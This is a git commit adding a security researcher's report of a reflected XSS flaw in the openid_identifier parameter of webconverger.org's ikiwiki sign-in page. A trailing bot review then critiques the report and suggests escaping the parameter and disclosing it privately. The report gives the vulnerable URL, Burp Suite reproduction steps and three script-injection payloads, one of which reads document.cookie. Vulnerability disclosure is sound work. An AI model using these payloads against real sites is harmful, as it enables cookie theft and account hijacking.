https://www.google.com/accounts/o8/id?id=AItOawkl0wS6X0mzN8lb-SFh3ajLB-7ezwfwyTw 2015-03-24 01:51:44 -04:00 committed by admin
parent ed9228e0b8
commit ed200f2039
1 changed files with 25 additions and 0 deletions

@ -0,0 +1,25 @@
Respected Sir,
Your website "webconverger.org" is vulnerable to XSS Attack.
Vulnerable Links:
webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
How To Reproduce The Vulnerability :
1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
3. forward the request
XSS Payload :
1. "></script><script>prompt(909043)</script>
2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>
3. "></script><script>prompt(document.cookie)</script>
NOTE : Proof of concept is attached.
Thank You...!!
Your Faithfully,
Raghav Bisht
raghav007bisht@gmail.com
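
Review bot: The line "NOTE : Proof of concept is attached." refers to an attachment, but this commit changes one file only, so the evidence is not part of the record; add the attachment or drop the line. The reproduction steps also omit what a maintainer needs for triage: the ikiwiki version in use and where in the response the openid_identifier value is echoed. All three payloads open with "> which suggests the value is reflected unescaped inside a double-quoted HTML attribute on the do=signin page, so the fix to verify is HTML-escaping of that parameter on output. If this page is publicly readable, consider keeping the report in a private channel until the fix is confirmed, and removing the reporter's e-mail address from the committed text.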